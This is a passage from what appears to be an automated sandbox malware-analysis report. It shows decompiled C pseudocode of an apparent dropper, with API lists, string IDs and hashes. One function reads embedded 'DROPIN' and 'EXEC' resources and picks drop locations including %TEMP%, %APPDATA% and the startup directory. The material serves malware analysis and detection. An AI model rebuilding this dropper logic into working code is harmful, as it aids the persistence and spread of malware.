					 *0x3ce178 = GetProcAddress(_t35, "FlsAlloc");
					 *0x3ce17c = GetProcAddress(_t35, "FlsGetValue");
					 *0x3ce180 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x3ce178;
					_t39 = TlsSetValue;
					 *0x3ce184 = _t7;
					if( *0x3ce178 == 0) {
						L6:
						 *0x3ce17c = TlsGetValue;
						 *0x3ce178 = E003C3DB7;
						 *0x3ce180 = _t39;
						 *0x3ce184 = TlsFree;
					} else {
						__eflags =  *0x3ce17c;
						if( *0x3ce17c == 0) {
							goto L6;
						} else {
							__eflags =  *0x3ce180;
							if( *0x3ce180 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x3cd1b4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x3ce17c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E003C2C62();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x3ce178);
							 *0x3ce178 = _t14;
							_t15 =  *_t41( *0x3ce17c);
							 *0x3ce17c = _t15;
							_t16 =  *_t41( *0x3ce180);
							 *0x3ce180 = _t16;
							 *0x3ce184 =  *_t41( *0x3ce184);
							_t18 = E003C3778();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E003C3DF4();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x3ce178, E003C3F78);
								 *0x3cd1b0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E003C4882(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x3ce180,  *0x3cd1b0, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E003C3E31(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E003C3DF4();
					return 0;
				}
			}





















                                                    0x003c40a7
                                                    0x003c40b5
                                                    0x003c40b9
                                                    0x003c40d9
                                                    0x003c40e6
                                                    0x003c40f3
                                                    0x003c40f8
                                                    0x003c40fa
                                                    0x003c4101
                                                    0x003c4107
                                                    0x003c410c
                                                    0x003c4124
                                                    0x003c4129
                                                    0x003c4133
                                                    0x003c413d
                                                    0x003c4143
                                                    0x003c410e
                                                    0x003c410e
                                                    0x003c4115
                                                    0x00000000
                                                    0x003c4117
                                                    0x003c4117
                                                    0x003c411e
                                                    0x00000000
                                                    0x003c4120
                                                    0x003c4120
                                                    0x003c4122
                                                    0x00000000
                                                    0x00000000
                                                    0x003c4122
                                                    0x003c411e
                                                    0x003c4115
                                                    0x003c4148
                                                    0x003c414e
                                                    0x003c4153
                                                    0x003c4156
                                                    0x003c421d
                                                    0x003c421d
                                                    0x003c421d
                                                    0x003c415c
                                                    0x003c4163
                                                    0x003c4165
                                                    0x003c4167
                                                    0x00000000
                                                    0x003c416d
                                                    0x003c416d
                                                    0x003c4178
                                                    0x003c417e
                                                    0x003c4186
                                                    0x003c418b
                                                    0x003c4193
                                                    0x003c4198
                                                    0x003c41a0
                                                    0x003c41a7
                                                    0x003c41ac
                                                    0x003c41b1
                                                    0x003c41b3
                                                    0x003c4218
                                                    0x003c4218
                                                    0x00000000
                                                    0x003c41b5
                                                    0x003c41b5
                                                    0x003c41c8
                                                    0x003c41ca
                                                    0x003c41cf
                                                    0x003c41d2
                                                    0x00000000
                                                    0x003c41d4
                                                    0x003c41e0
                                                    0x003c41e4
                                                    0x003c41e6
                                                    0x00000000
                                                    0x003c41e8
                                                    0x003c41f9
                                                    0x003c41fb
                                                    0x00000000
                                                    0x003c41fd
                                                    0x003c41fd
                                                    0x003c41ff
                                                    0x003c4200
                                                    0x003c4207
                                                    0x003c420d
                                                    0x003c4211
                                                    0x003c4215
                                                    0x003c4215
                                                    0x003c41fb
                                                    0x003c41e6
                                                    0x003c41d2
                                                    0x003c41b3
                                                    0x003c4167
                                                    0x003c4221
                                                    0x003c40bb
                                                    0x003c40bb
                                                    0x003c40c3
                                                    0x003c40c3

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003C3165), ref: 003C40AF
                                                    • __mtterm.LIBCMT ref: 003C40BB
                                                      • Part of subcall function 003C3DF4: DecodePointer.KERNEL32(00000005,003C421D,?,003C3165), ref: 003C3E05
                                                      • Part of subcall function 003C3DF4: TlsFree.KERNEL32(00000019,003C421D,?,003C3165), ref: 003C3E1F
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003C40D1
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003C40DE
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003C40EB
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003C40F8
                                                    • TlsAlloc.KERNEL32(?,003C3165), ref: 003C4148
                                                    • TlsSetValue.KERNEL32(00000000,?,003C3165), ref: 003C4163
                                                    • __init_pointers.LIBCMT ref: 003C416D
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C417E
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C418B
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C4198
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C41A5
                                                    • DecodePointer.KERNEL32(003C3F78,?,003C3165), ref: 003C41C6
                                                    • __calloc_crt.LIBCMT ref: 003C41DB
                                                    • DecodePointer.KERNEL32(00000000,?,003C3165), ref: 003C41F5
                                                    • __initptd.LIBCMT ref: 003C4200
                                                    • GetCurrentThreadId.KERNEL32 ref: 003C4207
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 3732613303-3819984048
                                                    • Opcode ID: db9fbc2f920729adc9db080db060edece7a05baab57dde4f688145a9058bb15d
                                                    • Instruction ID: 9e031b1b8685ee2db28c768baf6b59a6dfdbff8f775995f722a09ddfc288e3b2
                                                    • Opcode Fuzzy Hash: db9fbc2f920729adc9db080db060edece7a05baab57dde4f688145a9058bb15d
                                                    • Instruction Fuzzy Hash: 2E315E71940224AEEB236B75EC09F493BACEB49720F0B492EE454D32B0DB35AC51DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1EB0 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E003C1EB0(intOrPtr __edx, void* __eflags) {
				char _v12;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v48;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				signed int _t79;
				char _t91;
				signed int _t92;
				char _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				void* _t104;
				void* _t106;
				void* _t109;
				void* _t113;
				void* _t115;
				void* _t117;
				void* _t133;
				signed int _t135;
				void* _t136;
				signed int _t167;
				intOrPtr _t170;
				void* _t171;
				void* _t172;
				signed int _t174;
				intOrPtr _t177;
				void* _t184;
				void* _t190;
				char* _t191;
				intOrPtr* _t192;
				signed int _t193;
				intOrPtr* _t194;
				char _t195;
				void* _t198;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t216;
				signed int _t223;

				_t166 = __edx;
				_push(0xffffffff);
				_t207 = (_t205 & 0xfffffff8) - 0x48;
				_t77 =  *0x3cd07c; // 0xbd8f316a
				_v24 = _t77 ^ _t207;
				_t79 =  *0x3cd07c; // 0xbd8f316a
				 *[fs:0x0] =  &_v16;
				E003C1870( &_v56);
				_t208 = _t207 - 0x1c;
				_v12 = 0;
				_t191 = _t208;
				 *((intOrPtr*)(_t191 + 0x10)) = 0;
				 *((intOrPtr*)(_t191 + 0x14)) = 0xf;
				 *_t191 = 0;
				_v92 = _t208;
				E003C1420("DROPIN", 6, _t191);
				_t192 = E003C1AD0( &_v88, _t166,  &_v60, _t79 ^ _t207, _t172, _t190, _t133,  *[fs:0x0], E003C86C0);
				if(_t192 == 0x3cdbf8) {
					_t174 = 0;
					__eflags = 0;
				} else {
					if( *0x3cdc0c >= 0x10) {
						_t171 =  *0x3cdbf8; // 0x4d455400
						_push(_t171);
						E003C2BB1();
						_t208 = _t208 + 4;
					}
					_t174 = 0;
					 *0x3cdc0c = 0xf;
					 *0x3cdc08 = 0;
					 *0x3cdbf8 = 0;
					if( *((intOrPtr*)(_t192 + 0x14)) >= 0x10) {
						 *0x3cdbf8 =  *_t192;
						 *_t192 = 0;
					} else {
						E003C2850(0x3cdbf8, _t192,  *((intOrPtr*)(_t192 + 0x10)) + 1);
						_t208 = _t208 + 0xc;
					}
					 *0x3cdc08 =  *((intOrPtr*)(_t192 + 0x10));
					_t166 =  *((intOrPtr*)(_t192 + 0x14));
					 *0x3cdc0c =  *((intOrPtr*)(_t192 + 0x14));
					 *((intOrPtr*)(_t192 + 0x10)) = _t174;
					 *((intOrPtr*)(_t192 + 0x14)) = _t174;
				}
				_v12 = 0;
				if(_v68 >= 0x10) {
					_push(_v88);
					E003C2BB1();
					_t208 = _t208 + 4;
				}
				_t209 = _t208 - 0x1c;
				_t193 = _t209;
				 *((intOrPtr*)(_t193 + 0x10)) = _t174;
				 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
				_v92 = _t209;
				 *_t193 = 0;
				E003C1420("EXEC", 4, _t193);
				_push( &_v60);
				_t194 = E003C1AD0( &_v88, _t166);
				if(_t194 != 0x3cdc14) {
					_t216 =  *0x3cdc28 - 0x10; // 0xf
					if(_t216 >= 0) {
						_t170 =  *0x3cdc14; // 0x0
						_push(_t170);
						E003C2BB1();
						_t209 = _t209 + 4;
					}
					 *0x3cdc28 = 0xf;
					 *0x3cdc24 = 0;
					 *0x3cdc14 = 0;
					if( *((intOrPtr*)(_t194 + 0x14)) >= 0x10) {
						 *0x3cdc14 =  *_t194;
						 *_t194 = 0;
					} else {
						E003C2850(0x3cdc14, _t194,  *((intOrPtr*)(_t194 + 0x10)) + 1);
						_t209 = _t209 + 0xc;
					}
					 *0x3cdc24 =  *((intOrPtr*)(_t194 + 0x10));
					 *0x3cdc28 =  *((intOrPtr*)(_t194 + 0x14));
					 *((intOrPtr*)(_t194 + 0x10)) = 0;
					 *((intOrPtr*)(_t194 + 0x14)) = 0;
				}
				_v16 = 0;
				if(_v72 >= 0x10) {
					_push(_v92);
					E003C2BB1();
					_t209 = _t209 + 4;
				}
				_t195 =  *0x3cdc08; // 0x0
				_t91 = _t195;
				if(_t195 >= 6) {
					_t91 = 6;
				}
				_t177 =  *0x3cdc0c; // 0xf
				_t135 =  *0x3cdbf8; // 0x4d455400
				_t167 = _t135;
				if(_t177 < 0x10) {
					_t167 = 0x3cdbf8;
				}
				_t92 = E003C1040(_t91, "%TEMP%", _t167);
				if(_t92 == 0) {
					if(_t195 >= 6) {
						__eflags = _t195 - 6;
						_t35 = _t195 != 6;
						__eflags = _t35;
						_t92 = 0 | _t35;
					} else {
						_t92 = _t92 | 0xffffffff;
					}
					_t223 = _t92;
				}
				if((_t92 & 0xffffff00 | _t223 == 0x00000000) == 0) {
					_t94 = _t195;
					__eflags = _t195 - 9;
					if(_t195 >= 9) {
						_t94 = 9;
					}
					_t168 = _t135;
					__eflags = _t177 - 0x10;
					if(_t177 < 0x10) {
						_t168 = 0x3cdbf8;
					}
					_t95 = E003C1040(_t94, "%APPDATA%", _t168);
					__eflags = _t95;
					if(__eflags == 0) {
						__eflags = _t195 - 9;
						if(_t195 >= 9) {
							__eflags = _t195 - 9;
							_t43 = _t195 != 9;
							__eflags = _t43;
							_t95 = 0 | _t43;
						} else {
							_t95 = _t95 | 0xffffffff;
						}
						__eflags = _t95;
					}
					if(__eflags == 0) {
						_t97 = E003C25D0("%PROGFILES%", 0x3cdbf8);
						__eflags = _t97;
						if(_t97 == 0) {
							_t98 = E003C25D0("%DEFDRIVE%", 0x3cdbf8);
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 = E003C25D0("%STARTUPDIR%", 0x3cdbf8);
								__eflags = _t99;
								if(_t99 == 0) {
									_t100 = E003C25D0("%LAPPDATA%", 0x3cdbf8);
									__eflags = _t100;
									if(_t100 == 0) {
										_t101 = E003C25D0("%USERDIR%", 0x3cdbf8);
										__eflags = _t101;
										if(_t101 == 0) {
											_t209 = _t209 - 0x1c;
											_v96 = _t209;
											E003C1390("FULLPATH", _t209);
											_t168 =  &_v64;
											_push( &_v64);
											_t104 = E003C1AD0( &_v92,  &_v64);
											_v48 = 0xb;
										} else {
											_t104 = E003C1C50( &_v92, 5);
											_t209 = _t209 + 4;
											_v16 = 0xa;
										}
									} else {
										_t104 = E003C1C50( &_v92, 0x1c);
										_t209 = _t209 + 4;
										_v16 = 9;
									}
								} else {
									_t104 = E003C1C50( &_v92, 0x18);
									_t209 = _t209 + 4;
									_v16 = 8;
								}
								L59:
								E003C23D0(_t104, 0x3cdc30);
								_t106 = E003C2340( &_v96);
								goto L60;
							}
							_t159 =  &_v92;
							_t109 = E003C1DA0(_t135,  &_v92);
							_v16 = 6;
							E003C23D0(_t109, 0x3cdc30);
							_v16 = 0;
							__eflags = _v72 - 0x10;
							if(_v72 >= 0x10) {
								_t159 = _v92;
								_push(_v92);
								E003C2BB1();
								_t209 = _t209 + 4;
							}
							__eflags =  *0x3cdc40;
							if( *0x3cdc40 <= 0) {
								_t106 = E003C1420("C:\\", 3, 0x3cdc30);
								goto L60;
							} else {
								_t104 = E003C2440(_t159,  &_v92, 0x3cdc30, 3);
								_v24 = 7;
								goto L59;
							}
						}
						_t113 = E003C1C50( &_v92, 0x26);
						_t209 = _t209 + 4;
						_v16 = 5;
						_t106 = E003C23D0(_t113, 0x3cdc30);
						__eflags = _v72 - 0x10;
						if(_v72 >= 0x10) {
							_push(_v92);
							_t106 = E003C2BB1();
							_t209 = _t209 + 4;
						}
					} else {
						_t115 = E003C1C50( &_v92, 0x1a);
						_t209 = _t209 + 4;
						_v16 = 4;
						_t106 = E003C23D0(_t115, 0x3cdc30);
						__eflags = _v72 - 0x10;
						if(_v72 >= 0x10) {
							_t168 = _v92;
							_push(_v92);
							_t106 = E003C2BB1();
							_t209 = _t209 + 4;
						}
					}
					goto L60;
				} else {
					_t117 = E003C1E20(_t135,  &_v92);
					_v16 = 3;
					_t106 = E003C23D0(_t117, 0x3cdc30);
					if(_v72 >= 0x10) {
						_push(_v92);
						_t106 = E003C2BB1();
						_t209 = _t209 + 4;
					}
					L60:
					if(_v48 >= 0x10) {
						_push(_v68);
						_t106 = E003C2BB1();
						_t209 = _t209 + 4;
					}
					 *[fs:0x0] = _v28;
					_pop(_t184);
					_pop(_t198);
					_pop(_t136);
					return E003C2701(_t106, _t136, _v36 ^ _t209, _t168, _t184, _t198);
				}
			}




























































                                                    0x003c1eb0
                                                    0x003c1eb6
                                                    0x003c1ec4
                                                    0x003c1ec7
                                                    0x003c1ece
                                                    0x003c1ed5
                                                    0x003c1ee1
                                                    0x003c1eec
                                                    0x003c1ef3
                                                    0x003c1ef6
                                                    0x003c1efa
                                                    0x003c1f01
                                                    0x003c1f04
                                                    0x003c1f07
                                                    0x003c1f11
                                                    0x003c1f15
                                                    0x003c1f28
                                                    0x003c1f30
                                                    0x003c1f9d
                                                    0x003c1f9d
                                                    0x003c1f32
                                                    0x003c1f39
                                                    0x003c1f3b
                                                    0x003c1f41
                                                    0x003c1f42
                                                    0x003c1f47
                                                    0x003c1f47
                                                    0x003c1f4a
                                                    0x003c1f4c
                                                    0x003c1f52
                                                    0x003c1f58
                                                    0x003c1f63
                                                    0x003c1f7c
                                                    0x003c1f81
                                                    0x003c1f65
                                                    0x003c1f70
                                                    0x003c1f75
                                                    0x003c1f75
                                                    0x003c1f86
                                                    0x003c1f8c
                                                    0x003c1f8f
                                                    0x003c1f95
                                                    0x003c1f98
                                                    0x003c1f98
                                                    0x003c1f9f
                                                    0x003c1fa9
                                                    0x003c1faf
                                                    0x003c1fb0
                                                    0x003c1fb5
                                                    0x003c1fb5
                                                    0x003c1fb8
                                                    0x003c1fbb
                                                    0x003c1fbd
                                                    0x003c1fc0
                                                    0x003c1fcd
                                                    0x003c1fd1
                                                    0x003c1fd4
                                                    0x003c1fdd
                                                    0x003c1fe7
                                                    0x003c1ff4
                                                    0x003c1ff6
                                                    0x003c1ffc
                                                    0x003c1ffe
                                                    0x003c2004
                                                    0x003c2005
                                                    0x003c200a
                                                    0x003c200a
                                                    0x003c200d
                                                    0x003c2015
                                                    0x003c201b
                                                    0x003c2024
                                                    0x003c203d
                                                    0x003c2042
                                                    0x003c2026
                                                    0x003c2031
                                                    0x003c2036
                                                    0x003c2036
                                                    0x003c2047
                                                    0x003c2050
                                                    0x003c2056
                                                    0x003c2059
                                                    0x003c2059
                                                    0x003c205c
                                                    0x003c2065
                                                    0x003c206b
                                                    0x003c206c
                                                    0x003c2071
                                                    0x003c2071
                                                    0x003c2074
                                                    0x003c207a
                                                    0x003c207f
                                                    0x003c2081
                                                    0x003c2081
                                                    0x003c2086
                                                    0x003c208c
                                                    0x003c2092
                                                    0x003c2097
                                                    0x003c2099
                                                    0x003c2099
                                                    0x003c20a3
                                                    0x003c20aa
                                                    0x003c20af
                                                    0x003c20b8
                                                    0x003c20bb
                                                    0x003c20bb
                                                    0x003c20bb
                                                    0x003c20b1
                                                    0x003c20b1
                                                    0x003c20b1
                                                    0x003c20be
                                                    0x003c20be
                                                    0x003c20c5
                                                    0x003c20fe
                                                    0x003c2100
                                                    0x003c2103
                                                    0x003c2105
                                                    0x003c2105
                                                    0x003c210a
                                                    0x003c210c
                                                    0x003c210f
                                                    0x003c2111
                                                    0x003c2111
                                                    0x003c211b
                                                    0x003c2120
                                                    0x003c2122
                                                    0x003c2124
                                                    0x003c2127
                                                    0x003c2130
                                                    0x003c2133
                                                    0x003c2133
                                                    0x003c2133
                                                    0x003c2129
                                                    0x003c2129
                                                    0x003c2129
                                                    0x003c2136
                                                    0x003c2136
                                                    0x003c213d
                                                    0x003c2185
                                                    0x003c218a
                                                    0x003c218c
                                                    0x003c21d4
                                                    0x003c21d9
                                                    0x003c21db
                                                    0x003c2258
                                                    0x003c225d
                                                    0x003c225f
                                                    0x003c2280
                                                    0x003c2285
                                                    0x003c2287
                                                    0x003c22a8
                                                    0x003c22ad
                                                    0x003c22af
                                                    0x003c22c6
                                                    0x003c22d0
                                                    0x003c22d4
                                                    0x003c22d9
                                                    0x003c22dd
                                                    0x003c22e2
                                                    0x003c22e7
                                                    0x003c22b1
                                                    0x003c22b7
                                                    0x003c22bc
                                                    0x003c22bf
                                                    0x003c22bf
                                                    0x003c2289
                                                    0x003c228f
                                                    0x003c2294
                                                    0x003c2297
                                                    0x003c2297
                                                    0x003c2261
                                                    0x003c2267
                                                    0x003c226c
                                                    0x003c226f
                                                    0x003c226f
                                                    0x003c22ec
                                                    0x003c22f3
                                                    0x003c22fc
                                                    0x00000000
                                                    0x003c22fc
                                                    0x003c21dd
                                                    0x003c21e1
                                                    0x003c21ed
                                                    0x003c21f2
                                                    0x003c21f7
                                                    0x003c21fc
                                                    0x003c2201
                                                    0x003c2203
                                                    0x003c2207
                                                    0x003c2208
                                                    0x003c220d
                                                    0x003c220d
                                                    0x003c2210
                                                    0x003c2217
                                                    0x003c2244
                                                    0x00000000
                                                    0x003c2219
                                                    0x003c2226
                                                    0x003c222b
                                                    0x00000000
                                                    0x003c222b
                                                    0x003c2217
                                                    0x003c2194
                                                    0x003c2199
                                                    0x003c21a3
                                                    0x003c21a8
                                                    0x003c21ad
                                                    0x003c21b2
                                                    0x003c21bc
                                                    0x003c21bd
                                                    0x003c21c2
                                                    0x003c21c2
                                                    0x003c213f
                                                    0x003c2145
                                                    0x003c214a
                                                    0x003c2154
                                                    0x003c2159
                                                    0x003c215e
                                                    0x003c2163
                                                    0x003c2169
                                                    0x003c216d
                                                    0x003c216e
                                                    0x003c2173
                                                    0x003c2173
                                                    0x003c2163
                                                    0x00000000
                                                    0x003c20c7
                                                    0x003c20cb
                                                    0x003c20d7
                                                    0x003c20dc
                                                    0x003c20e6
                                                    0x003c20f0
                                                    0x003c20f1
                                                    0x003c20f6
                                                    0x003c20f6
                                                    0x003c2301
                                                    0x003c2306
                                                    0x003c230c
                                                    0x003c230d
                                                    0x003c2312
                                                    0x003c2312
                                                    0x003c2319
                                                    0x003c2321
                                                    0x003c2322
                                                    0x003c2323
                                                    0x003c2332
                                                    0x003c2332

                                                    APIs
                                                      • Part of subcall function 003C1AD0: FindResourceA.KERNEL32(00000000,?,?), ref: 003C1B20
                                                    • _memmove.LIBCMT ref: 003C1F70
                                                      • Part of subcall function 003C1C50: SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000,BD8F316A), ref: 003C1C9E
                                                      • Part of subcall function 003C23D0: _memmove.LIBCMT ref: 003C2403
                                                    • _memmove.LIBCMT ref: 003C2031
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memmove$FindFolderPathResourceSpecial
                                                    • String ID: %APPDATA%$%DEFDRIVE%$%LAPPDATA%$%PROGFILES%$%STARTUPDIR%$%TEMP%$%USERDIR%$C:\$DROPIN$EXEC$FULLPATH
                                                    • API String ID: 1519558674-3215377631
                                                    • Opcode ID: 1918c90f61fa99b5b94fe500c2e8d758c1e0388e9a320282e47e110cd11ee9db
                                                    • Instruction ID: 73e405d3781e5564b7e3edcdbf1a7afb84b0c1790dbb6b4476b0446678833df6
                                                    • Opcode Fuzzy Hash: 1918c90f61fa99b5b94fe500c2e8d758c1e0388e9a320282e47e110cd11ee9db
                                                    • Instruction Fuzzy Hash: F8C19AB59183408BD712EF289842F1BB7E5AB96310F05493DF896CB292EB75EC44C793
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1AD0 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E003C1AD0(void** __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a28) {
				struct HINSTANCE__* _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				void* _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t34;
				intOrPtr _t36;
				void* _t39;
				long _t40;
				intOrPtr* _t46;
				struct HRSRC__* _t59;
				void* _t61;
				CHAR* _t63;
				intOrPtr _t65;
				void* _t75;
				void* _t77;
				void** _t80;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;

				_t71 = __edx;
				_push(0xffffffff);
				_push(E003C8598);
				_push( *[fs:0x0]);
				_t84 = _t83 - 0x10c;
				_t33 =  *0x3cd07c; // 0xbd8f316a
				_t34 = _t33 ^ _t82;
				_v20 = _t34;
				_push(_t34);
				 *[fs:0x0] =  &_v16;
				_t36 = _a4;
				_t80 = __ecx;
				_v284 = 0;
				_v8 = 0;
				_t63 = _a8;
				if(_a28 < 0x10) {
					_t63 =  &_a8;
				}
				_t59 = FindResourceA(0, _t63,  *(_t36 + 0x1c));
				if(_t59 != 0) {
					_t39 = LoadResource(0, _t59);
					_t75 = _t39;
					if(_t75 != 0) {
						_t40 = SizeofResource(0, _t59);
						_v284 = LockResource(_t75);
						_v280 = 0;
						E003C57C0( &_v279, 0, 0x103);
						E003C2850( &_v280, _v284, _t40);
						_t84 = _t84 + 0x18;
						FreeResource(_t75);
						_t46 =  &_v280;
						_t80[5] = 0xf;
						_t80[4] = 0;
						 *_t80 = 0;
						_t26 = _t46 + 1; // 0x1
						_t71 = _t26;
						do {
							_t65 =  *_t46;
							_t46 = _t46 + 1;
						} while (_t65 != 0);
						E003C1420( &_v280, _t46 - _t71, _t80);
						if(_a28 >= 0x10) {
							_push(_a8);
							goto L12;
						}
					} else {
						_t80[4] = _t39;
						_t80[5] = 0xf;
						 *_t80 = _t39;
						E003C1420(0x3cb0aa, _t75, _t80);
						if(_a28 >= 0x10) {
							_t71 = _a8;
							_push(_a8);
							goto L12;
						}
					}
				} else {
					_t80[4] = 0;
					_t80[5] = 0xf;
					 *_t80 = 0;
					E003C1420(0x3cb0aa, 0, _t80);
					if(_a28 >= 0x10) {
						_push(_a8);
						L12:
						E003C2BB1();
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t77);
				_pop(_t81);
				_pop(_t61);
				return E003C2701(_t80, _t61, _v20 ^ _t82, _t71, _t77, _t81);
			}





























                                                    0x003c1ad0
                                                    0x003c1ad3
                                                    0x003c1ad5
                                                    0x003c1ae0
                                                    0x003c1ae1
                                                    0x003c1ae7
                                                    0x003c1aec
                                                    0x003c1aee
                                                    0x003c1af4
                                                    0x003c1af8
                                                    0x003c1afe
                                                    0x003c1b03
                                                    0x003c1b05
                                                    0x003c1b0b
                                                    0x003c1b12
                                                    0x003c1b15
                                                    0x003c1b17
                                                    0x003c1b17
                                                    0x003c1b26
                                                    0x003c1b2a
                                                    0x003c1b5a
                                                    0x003c1b60
                                                    0x003c1b64
                                                    0x003c1b92
                                                    0x003c1ba6
                                                    0x003c1bb5
                                                    0x003c1bbc
                                                    0x003c1bd0
                                                    0x003c1bd5
                                                    0x003c1bd9
                                                    0x003c1bdf
                                                    0x003c1be5
                                                    0x003c1bec
                                                    0x003c1bf3
                                                    0x003c1bf6
                                                    0x003c1bf6
                                                    0x003c1c00
                                                    0x003c1c00
                                                    0x003c1c02
                                                    0x003c1c03
                                                    0x003c1c11
                                                    0x003c1c1a
                                                    0x003c1c1f
                                                    0x00000000
                                                    0x003c1c1f
                                                    0x003c1b66
                                                    0x003c1b66
                                                    0x003c1b69
                                                    0x003c1b70
                                                    0x003c1b77
                                                    0x003c1b80
                                                    0x003c1b86
                                                    0x003c1b89
                                                    0x00000000
                                                    0x003c1b89
                                                    0x003c1b80
                                                    0x003c1b2c
                                                    0x003c1b2c
                                                    0x003c1b2f
                                                    0x003c1b3d
                                                    0x003c1b40
                                                    0x003c1b49
                                                    0x003c1b52
                                                    0x003c1c20
                                                    0x003c1c20
                                                    0x003c1c25
                                                    0x003c1b49
                                                    0x003c1c2d
                                                    0x003c1c35
                                                    0x003c1c36
                                                    0x003c1c37
                                                    0x003c1c45

                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,?,?), ref: 003C1B20
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 003C1B5A
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 003C1B92
                                                    • LockResource.KERNEL32(00000000), ref: 003C1B9B
                                                    • _memset.LIBCMT ref: 003C1BBC
                                                    • _memmove.LIBCMT ref: 003C1BD0
                                                    • FreeResource.KERNEL32(00000000), ref: 003C1BD9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
